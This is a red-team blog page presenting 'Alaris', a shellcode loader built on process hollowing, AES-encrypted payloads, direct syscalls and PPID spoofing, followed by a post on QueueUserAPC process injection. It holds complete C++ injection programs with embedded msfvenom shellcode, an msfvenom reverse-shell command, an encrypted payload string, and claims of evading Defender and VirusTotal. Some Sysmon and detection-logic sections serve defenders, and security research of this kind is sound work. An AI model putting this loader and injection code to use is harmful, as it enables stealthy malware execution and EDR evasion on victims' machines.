Alaris | A Protective Loader

14 October 2020 at 23:35

Sevro Security

To date, we’ve reviewed techniques such as shellcode loading and encryption, circumventing detection, and building in our own syscalls.

Today, I’m releasing Alaris, a new shellcode loader that will utilize many of the previous techniques discussed within this blog as well as add a few new ones. We’re going to use known and widely used tactics that I, and many other Red Teams, have been using for a while. The best documentation (easiest to digest and implement) on many of these TTPs is available on ired.team. I will include documentation/links everywhere in this post.

The primary goal of this loader is proactive protection and self-sufficiency. I want to rely mostly on the code we write for the heavy (malicious) lifting. With that said, I am still going to use extraordinarily helpful headers and libraries such as windows.h and std::vector. However, the more self-sufficient we become and the lower the level at which we execute our code, the less noise we make, and that’s a damn good thing, as seen in the detection portion of this post.

Overview

To help you avoid issues on your end, here are my development environment specifics.

System: Windows 10 (Build 17763)
IDE: Visual Studio 2019
Language: C, C++, x86 ASM (VS19 Project is Visual C++)
- Loader.cpp – Shellcode Loader
- Cryptor.cpp – Shellcode Encryption

Alaris is a shellcode loading application utilizing the Process Hollowing technique. There are going to be two (2) distinct processes that we’ll start and analyze. In the graphic below I detail both of the processes where Red is the loader process and Green is the hollowed (child) process.

The Parent Process [loader.exe]: This is the process that is going to decode, decrypt, and add the shellcode to a hollowed process.
1. Shellcode decryption via aes.c (AES-256-CBC)
2. Shellcode decoding via base64.cpp
3. Direct x86 syscalls via low.asm (thanks to SysWhispers), using NtQueueApcThread() to add the shellcode.
4. Disallow non-Microsoft-signed DLLs from injecting into the process.
The Hollowed (Child) Process [mobsync.exe]: The child process started by CreateProcess(). We’re using mobsync.exe here, but there are many different executables you can use.
1. Disallow non-Microsoft-signed DLLs from injecting into the process.
2. Parent Process ID spoofing to explorer.exe

Protecting Our Malware

There are several tactics we’re using to not only protect our initial execution but also our child (hollowed) process. Let’s go through each of them at a pretty high level.

Shellcode Encryption

Within this loader is an embedded AES (128, 192, 256) (ECB, CTR, CBC) implementation. Not relying on Windows Crypto APIs or known libraries, such as Crypto++, helps limit our noise and overall footprint.

We’re encrypting our shellcode with AES-256-CBC. The key and IV live in the code and are not obfuscated, encoded, etc. The primary purpose of encrypting our shellcode is to defeat static signature-based detection (i.e., \xFC\xE8, \xFC\x48). We’re not going to bypass entropy detection or the good job Windows Defender does at analyzing large, high-entropy Base64 blobs. However, if we use a staged payload or a small payload, we can circumvent most EDR systems simply by encrypting our shellcode.
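To make the entropy point concrete from the defender’s side, here is a minimal sketch of a Shannon entropy calculation over a byte buffer. The function name `shannonEntropy` is hypothetical and is not part of Alaris or of any Defender interface; it only illustrates the kind of measurement an entropy-based check might perform.

```cpp
#include <array>
#include <cmath>
#include <cstddef>
#include <cstdint>
#include <vector>

// Shannon entropy of a byte buffer, in bits per byte (0.0 to 8.0).
// Hypothetical helper for illustration only.
double shannonEntropy(const std::vector<std::uint8_t>& data) {
    if (data.empty()) return 0.0;

    // Count how often each byte value occurs.
    std::array<std::size_t, 256> counts{};
    for (std::uint8_t b : data) ++counts[b];

    // Sum -p * log2(p) over every byte value that appears.
    double entropy = 0.0;
    const double total = static_cast<double>(data.size());
    for (std::size_t c : counts) {
        if (c == 0) continue;
        const double p = static_cast<double>(c) / total;
        entropy -= p * std::log2(p);
    }
    return entropy;
}
```

Raw ciphertext tends toward the 8 bits per byte ceiling, while Base64 text can never exceed 6 bits per character because its alphabet has only 64 symbols. A long string sitting close to that ceiling is the sort of blob that stands out to a scanner.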

All shellcode encryption is done via Cryptor.exe, which is part of the Visual Studio project.

Direct x86 Syscalls

Direct syscalls allow us to avoid going through ntdll.dll for a large majority of the process hollowing. We’re executing the syscalls ourselves via x86 assembly located in low.asm and, as such, we’re staying quieter and executing our code at a lower level. This decreases the likelihood of detection by products that rely on hooking those ntdll.dll functions.

I’ve gone pretty deep into direct x86 Syscalls for Process Injection using both CreateRemoteThread() and QueueUserAPC() in these two posts:

Preventing 3rd Party DLLs from Injecting into your Malware

We’re blocking all non-Microsoft DLLs (i.e., DLLs that have not been signed by Microsoft) from hooking/injecting into our process (both the Parent and Child). Keep in mind, there are a few EDR solutions out there that have co-signed drivers (Company + Microsoft). To get a better understanding of how this works and why, I would suggest reading ired.team’s write-up.

// Disallow non-microsoft signed DLL's from hooking/injecting into our CreateProcess():
InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &size);
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(policy), NULL, NULL);

// Disallow non-MSFT signed DLL's from injecting
PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY sp = {};
sp.MicrosoftSignedOnly = 1;
SetProcessMitigationPolicy(ProcessSignaturePolicy, &sp, sizeof(sp));

PPID Spoofing

We’re spoofing the parent process ID of our child process (hollowed process). We want to make it look like this process was spawned organically (explorer.exe -> mobsync.exe) rather than the true path of execution (loader.exe -> mobsync.exe).

This is a fairly simple technique that I find is more fun for the Blue Team to hunt for than it is genuinely helpful for staying hidden. However, it is still a bit sneaky: at first glance the execution path does not look suspect, and it may slip under the radar of some teams.

Overwrite Shellcode

This is not foolproof and will not stop many Blue Teams from dumping your shellcode if they get hold of your binary. This is simply a cleanup method to remove your shellcode from memory for good measure.

Alaris Build & Execution

Let’s walk through the build and execution path from start to shell. I’ve generated a simple reverse shell with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -f raw >> 64b_443_localhost_revshell.bin

Building

Included in this package is a cryptor. To encrypt, simply build the Visual Studio project as-is and execute cryptor.exe with the path of a raw (binary) shellcode file.

λ cryptor.exe
Usage:  cryptor.exe <payload.bin>
Example cryptor.exe C:\Users\admin\shellcode.bin

λ cryptor.exe ..\..\..\test\64b_443_localhost_revshell.bin
[i] Replace shellcode string in loader with one below:

shellcode = "z33lrIYAG7pcIAZfrX7cRKLyNwr1w+zD1pSGQXA/0emhQBn2C1z5SjOjyGu5FL2Wrq3xADX+MDyaZs/F8BIBXcqPK1TFdESehzl8uO8+NT+Mda0BjZSGUcd0qs3PO4klwSOhSDrlTUhjCe9+7QoaFc8g0yTIGiAP674VA6URsKd9y0szNTBgSgn/L6gB2WpfGQ4UBaHGDiQ8GwrzedHh/eTbhZtS2/9HEoVqkoAqG2gts1rWt4ckzvEJRM8v4zJxLzMEtNnf3e9TBaG1CNfWCWg+SPIfW2L6SLUA16EadwwSihhKk84KGQyTEgQ9Ue1/VMt30TREUC46P3IvidPVG6LgIQs5pHXYEPPBBV2vCufLCQ3F6ChFwMhZJvzRF/30P6+POoyFAMHvwSrebSGiliwWgrqcAvRPuWxcu3T5DdqEXoDzESk75W8n4kGZWI3cgiVvDpTt3vFST2gdW7j2ri75T0P5Ut1HWAxGr75ir68RX4HB8Mli78eP6UcLuFHULrz5W0tpA3yyefUapF7mK+gGbuFZ6pyLRrkG2XWLmo1Ji1/2yGzuHQ0Q4HacssCuN/peqkKbm++unMiu/D3lGlH2KGdCBhBEubVULKFFvZ0=";

Replace the shellcode variable in the main function of loader.cpp with the new shellcode variable generated by cryptor.exe
Build a Release version.

Execution

I’m using Process Hacker to review both the Parent and Child (hollowed) processes. Let’s first take a look at the Parent process attributes.

The image below shows details of the loader.exe process. We can verify that our DLL signature requirement, which disallows all non-Microsoft-signed DLLs from injecting into our process, is enabled.

Moving into the mobsync.exe process generated by our CreateProcess() call, we can verify that the PPID is in fact explorer.exe due to our spoofing, and that we have 3rd party DLL injection blocking similar to loader.exe.

EDR Bypass and Detection Analysis

I generated two (2) Alaris loaders with different MSFVenom payloads:

loader_rev.exe – Compiled with a reverse shell (127.0.0.1:443)
loader_notepad.exe – Compiled with shellcode that executes notepad.exe

Sysmon Events

Sysmon generated five (5) events during loader_rev.exe execution. We do not see suspect process injection events because we are using NtQueueApcThread(). If we were to use CreateRemoteThread() instead, we would see a Sysmon Event ID 8 (CreateRemoteThread).

There are two (2) process creates: one for loader.exe and the other for mobsync.exe executing the shellcode.

The interesting thing here is that the second Process Create does not explicitly call out mobsync.exe being executed. Instead, it lists mobsync.exe as the parent process and shows the shellcode executed via cmd within the CommandLine field. This must be a byproduct of the process hollowing, but I am not 100% sure why just yet.
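For the Blue Team, that observation can be turned into a simple triage rule. The sketch below is hypothetical: it assumes each Process Create record has already been reduced to a small struct holding the Image, ParentImage, and CommandLine fields, and the names `ProcessCreateEvent`, `baseNameLower`, and `isSuspiciousShellSpawn` are invented for illustration. It flags a command shell whose recorded parent is mobsync.exe.

```cpp
#include <algorithm>
#include <cctype>
#include <cstddef>
#include <string>

// Hypothetical, simplified view of a Sysmon Process Create record.
struct ProcessCreateEvent {
    std::string image;        // e.g. C:\Windows\System32\cmd.exe
    std::string parentImage;  // e.g. C:\Windows\System32\mobsync.exe
    std::string commandLine;
};

// Lower-cased file name portion of a Windows path.
std::string baseNameLower(const std::string& path) {
    const std::size_t slash = path.find_last_of("\\/");
    std::string name = (slash == std::string::npos) ? path : path.substr(slash + 1);
    std::transform(name.begin(), name.end(), name.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return name;
}

// Flag a command shell whose recorded parent is mobsync.exe.
bool isSuspiciousShellSpawn(const ProcessCreateEvent& ev) {
    return baseNameLower(ev.parentImage) == "mobsync.exe" &&
           baseNameLower(ev.image) == "cmd.exe";
}
```

A real rule would need a broader list of unlikely parents and shells, since mobsync.exe is only the host chosen in this post.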

Bypassing Defender

Executing loader_notepad.exe on an updated and fully patched Windows 10 system did not result in any detections from Defender. The results were identical with loader_rev.exe.

VirusTotal

I tested both versions of Alaris against VirusTotal to get a better idea of the overall detection / suspect percentage, and neither produced any detections. This is possibly a symptom of not having common indicators such as a URI string or an IP address (other than 127.0.0.1) embedded in either the shellcode or the source.

Detection

Alaris

Alaris Yara Rule

Tactics

Conclusion

The TTPs used within Alaris are common among Red Teams and used within several C2 frameworks (Cobalt Strike for example). Alaris is a simple and small example of how you can customize these tactics to circumvent several different detection mechanisms as well as make your code look more “legitimate” in the context of Microsoft applications.

Joshua

Process Injection Part 2 | QueueUserAPC()

Sevro Security

Joshua

13 April 2020 at 18:09


In the first process injection post, we talked about CreateRemoteThread(), which is the vanilla method of process injection that most threat actors use considering its simplicity and reliability. Today we’re going to look at QueueUserAPC(), which queues an asynchronous procedure call (APC) to a specific thread. This API has several benefits, the most appreciated of which is its ability to circumvent Sysmon.

This post will be broken down into four (4) parts:

Process Injection Primer – Subject to the injection technique, we will review how this type of injection works programmatically.
Analyze High Level Windows API Calls – Use the MSDN Documented methods and functions.
- API Call Analysis
- Sysmon events and logging
Analyze Medium Level Windows Syscalls Using LoadLibrary – Use the NTAPI Undocumented functions via ntdll.dll
- API Call Analysis
- Sysmon events and logging
Analyze Low Level Windows Syscalls Using x86 Assembly – Custom via Rolling Our Own Syscalls
- API Call Analysis
- Sysmon events and logging

For the Sysmon analysis, I am using the same Sysmon config as Part 1 with one slight adjustment. Considering QueueUserAPC() will bypass Sysmon detection, I have expanded the Process Accessed (Event ID 10) parameters based on ion-storm’s configuration. With this event, we can detail the specifics of the injection without actually seeing an injection event (i.e., by correlation).

Before we go any deeper, let me define what I mean when I say High, Medium, and Low level APIs:

High-Level API – This is the MSDN (proper/safe) method of execution. In other words, if you were a developer, and you needed to use these functions legitimately, you would use the MSDN documentation to accomplish your goal. These functions are High-Level because they are translated by the OS to Medium/Low level functions and instructions. This is done for several reasons the most important of which is ease of development.
Medium-Level API – The OS maps High-Level API calls to Lower-Level API calls (which in the context of this post we’re calling medium-level). For our purposes, a large majority of those calls live within ntdll.dll and kernel32.dll. We get the “Medium-Level” by cutting out the middle man (the OS) and calling the Low-Level API calls ourselves. The reason I call it Medium is that we are still using DLLs that live on the Windows OS, and when we map and call functions from those DLLs, the OS and other system monitoring software can still see those calls.
Low-Level API – The “Low-Level” is defined by rolling our own everything! We do not use ntdll.dll or kernel32.dll to accomplish our process injection (i.e., we do not map any functions). In this case, we have a custom x86 assembly file (custom.asm) and a corresponding header file (custom.h). These files map direct syscall functions in order to (essentially) circumvent both the High and Medium level APIs. Regarding the process injection, we do not load external resources or rely on any OS translation; we do it ourselves.

All source code is written in C++ or x86 ASM. For continuity, I will be compiling all my builds for 64-bit (x64) architectures.

Reference Material

MSDN Documentation for all High-Level API calls.
- SuspendThread
- VirtualAllocEx
- WriteProcessMemory
- QueueUserAPC
- ResumeThread

NTAPI Undocumented Functions for all Low-Level API Calls.
- NtSuspendThread
- NtAllocateVirtualMemory
- NtWriteVirtualMemory
- NtQueueApcThread
- NtResumeThread

Tools
- Sysmon: For the Sysmon Analysis portion, I am using SwiftOnSecurity’s Sysmon Configuration for basic analysis. This is a great starter configuration that should be amended/changed to meet your organization’s threat model/needs. A good example of what can be done with Swift’s stock configuration is the one that ion-storm developed.
- API Monitor: We use this tool to review the true API calls for all levels of APIs.
- Process Hacker: A great tool for analyzing processes in general.
- Procmon: Similar to Process Hacker but with some more advanced features such as determining API calls from user to kernel land.
- SysWhispers: @Jackson_T’s Python tool that generates x86 ASM that can be directly imported into your C++ project.

Process Injection Primer

QueueUserAPC() queues an Asynchronous Procedure Call (APC). Let’s break down what that means:

Asynchronous – not simultaneous or concurrent in time.
Procedure Call – The details of a specific, singular, procedure. In our example, it’s the shellcode that will execute notepad.exe.

This means a few things. First, since it’s asynchronous we need to be able to pause/suspend the thread that is going to execute our shellcode (i.e., we cannot have the thread running when we give it a procedure). Second, we need to open the thread (OpenThread()) and assign it a procedure. Last, we need to resume the thread to obtain code execution.
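The suspend, queue, and resume sequence described above can be pictured with a toy model. The class below is purely illustrative and is not the Windows API: `ToyThread`, `queueProcedure`, and `resume` are hypothetical names, and the model ignores details of real APC delivery. It only shows that a queued procedure does nothing until the thread it was assigned to starts running again.

```cpp
#include <cstddef>
#include <functional>
#include <queue>
#include <utility>

// Toy model only: a "thread" that holds queued procedures and runs them
// when it is resumed. This does not call or emulate any Windows API.
class ToyThread {
public:
    // Queue a procedure; nothing executes yet.
    void queueProcedure(std::function<void()> procedure) {
        pending_.push(std::move(procedure));
    }

    // Resume the thread and drain the queue in FIFO order.
    // Returns the number of procedures that ran.
    int resume() {
        int executed = 0;
        while (!pending_.empty()) {
            std::function<void()> procedure = std::move(pending_.front());
            pending_.pop();
            procedure();
            ++executed;
        }
        return executed;
    }

    // Number of procedures still waiting to run.
    std::size_t pendingCount() const { return pending_.size(); }

private:
    std::queue<std::function<void()>> pending_;
};
```

Queueing a lambda that increments a counter leaves the counter untouched until `resume()` is called, which mirrors the "not simultaneous" part of the definition.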

In the examples to follow, I create an nslookup.exe process in the C++ code and then inject the shellcode into it. However, an attacker may want to be more dynamic with their injection. There are really three ways to go about QueueUserAPC injection:

Start a suspended process (CreateProcess()), inject into it, resume threads.
Have a predefined process name (such as explorer.exe) that we know is going to be running on system, enumerate processes for PID’s, enumerate the threads of the selected PID, suspend the threads, inject shellcode, resume threads.
1. I have provided an example below within the Real World Example section.
Have a list/array of predefined process names that the code will enumerate if said process is running, enumerate processes for PID’s, enumerate the threads of the selected PID, suspend the threads, inject shellcode, resume threads.

VirtualAllocEx() → WriteProcessMemory()

Just like CreateRemoteThread(), we allocate memory in the external process’s memory space and write our shellcode to that newly allocated space.

QueueUserAPC() Process Injection - writing memory

SuspendThread()

NOTE: In the examples to come, I create a process in a suspended state. However, if you have selected an already running process, you will have to manually enumerate the threads associated with the process and suspend the threads you are going to inject into. I say this because you will not see the OpenProcess() or SuspendThread() API calls in my code.

Once a process has been selected and you have the thread IDs, you can suspend all or a single thread with the SuspendThread() API call. In a debugger, I have generated an nslookup.exe process in a suspended state. We can look at the process in Process Hacker to verify that our thread is in fact suspended.

QueueUserAPC() Process Injection - suspending threads

QueueUserAPC() → ResumeThread()

We assign the procedure call (execute the shellcode) to the suspended nslookup.exe thread via the QueueUserAPC() API. Next, we resume the thread to move the thread’s state from Wait:Suspended to Running. Once the thread starts, it will execute the procedure call (our shellcode) and terminate itself.

High Level API

#include <iostream>
#include <Windows.h>

int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE 
        CREATE_SUSPENDED |              // Create Suspended for APC Injection
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 2000); // Allow nslookup 2 seconds to start/initialize.
    hProcess = pi.hProcess;
    hThread = pi.hThread;

    // Allocation Memory and Write shellcode to the allocated buffer
    allocation_start = VirtualAllocEx(hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, allocation_start, shellcode, allocation_size, NULL);

    // Inject into the suspended thread.
    PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)allocation_start;
    //hThread = OpenThread(THREAD_ALL_ACCESS, TRUE, pi.dwThreadId); // <-- Open a Thread if needed
    QueueUserAPC((PAPCFUNC)apcRoutine, hThread, NULL);

    // Resume the suspended thread
    ResumeThread(hThread);
    
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	174
Total Amount of Memory Used	116 KB

QueueUserAPC() Process Injection - High Level API Analysis

We’ve mapped each API call during the High Level API execution flow. We can easily see which Low Level API function each High Level API call is translated to at runtime (e.g., VirtualAllocEx → NtAllocateVirtualMemory). This is an important point of interest, as it’s common practice for AV / EDR systems to hook these API calls prior to them being handed off to the Windows kernel to execute a syscall. Our goal is to go lower and therefore avoid such hooks.

Sysmon Analysis

Sysmon is unable to detect process injection via QueueUserAPC(). This is, from my limited understanding, because we are not creating a new thread within the victim process. We are enumerating the threads the process has instantiated, opening the thread, suspending it, giving it a procedure call (our shellcode), and resuming the thread. We are simply accessing a process and telling it to execute some procedure, which is a bit less invasive.

Looking at the image above, we have keyed in on Sysmon Event ID 10: Process Accessed. During our injection, we do request access to a process via OpenProcess() or NtOpenProcess(). My example does not open a process to access it since I have used CreateProcess() for demonstration purposes. However, we can still see that Sysmon has detected that the program PI_QUA_High_Level.exe has accessed C:\Windows\System32\nslookup.exe. The interesting part is that Sysmon records a full Call Trace for the event. This could possibly be used for heuristic detection.
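As one possible shape for such a heuristic, the sketch below splits a Call Trace string into frames and counts the frames that do not resolve to a module on disk. It rests on two assumptions about the field’s format that should be checked against your own Sysmon logs: frames are separated by `|`, and an unresolved frame begins with the literal text `UNKNOWN`. The function names are hypothetical.

```cpp
#include <sstream>
#include <string>
#include <vector>

// Split a Call Trace string into frames.
// Assumption: frames are separated by '|'.
std::vector<std::string> splitCallTrace(const std::string& callTrace) {
    std::vector<std::string> frames;
    std::stringstream stream(callTrace);
    std::string frame;
    while (std::getline(stream, frame, '|')) {
        if (!frame.empty()) frames.push_back(frame);
    }
    return frames;
}

// Count frames that do not resolve to a module on disk.
// Assumption: such frames start with the literal text "UNKNOWN".
int countUnbackedFrames(const std::string& callTrace) {
    int count = 0;
    for (const std::string& frame : splitCallTrace(callTrace)) {
        if (frame.rfind("UNKNOWN", 0) == 0) ++count;
    }
    return count;
}
```

A non-zero count is only a lead for an analyst to follow up on, not a verdict, because legitimate software that generates code at runtime can produce unresolved frames as well.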

Medium Level API

Let’s move a bit lower this time. As stated in the beginning of this post, the designation Medium Level API is simply my nomenclature which means we are avoiding the OS translation and are going to map/call the Nt* functions directly.

#include <iostream>
#include <Windows.h>

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _PS_ATTRIBUTE
{
    ULONG  Attribute;
    SIZE_T Size;
    union
    {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST
{
    SIZE_T       TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID
{
    void* UniqueProcess;
    void* UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        VOID* Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

typedef VOID(NTAPI* PIO_APC_ROUTINE) (
    IN PVOID            ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG            Reserved);

typedef NTSTATUS(NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
typedef NTSTATUS(NTAPI* pNtOpenThread)(PHANDLE ThreadHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID);
typedef NTSTATUS(NTAPI* pNtSuspendThread)(HANDLE ThreadHandle, PULONG SuspendCount);
typedef NTSTATUS(NTAPI* pNtAlertResumeThread)(HANDLE ThreadHandle, PULONG SuspendCount);
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect);
typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext OPTIONAL, PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, ULONG ApcReserved OPTIONAL);


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE 
        CREATE_SUSPENDED |              // Create Suspended for APC Injection
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 
    hProcess = pi.hProcess;
    hThread = pi.hThread;
    
    // MEDIUM LEVEL API:
    // Stole Some Code From --> https://github.com/uvbs/NT-APC-Injector
    FARPROC fpAddresses[6] = {
        GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtWriteVirtualMemory"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSuspendThread"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAlertResumeThread"),
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueueApcThread")
    };

    // setup for NTAPI functions
    pNtAllocateVirtualMemory fNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)fpAddresses[1];
    pNtWriteVirtualMemory fNtWriteVirtualMemory = (pNtWriteVirtualMemory)fpAddresses[2];
    pNtSuspendThread fNtSuspendThread = (pNtSuspendThread)fpAddresses[3];
    pNtAlertResumeThread fNtAlertResumeThread = (pNtAlertResumeThread)fpAddresses[4];
    pNtQueueApcThread fNtQueueApcThread = (pNtQueueApcThread)fpAddresses[5];

    allocation_start = nullptr;
    fNtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    fNtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    fNtQueueApcThread(hThread, (PIO_APC_ROUTINE)allocation_start, allocation_start, NULL, NULL);
    fNtAlertResumeThread(hThread, NULL);
    
}

API Call Analysis

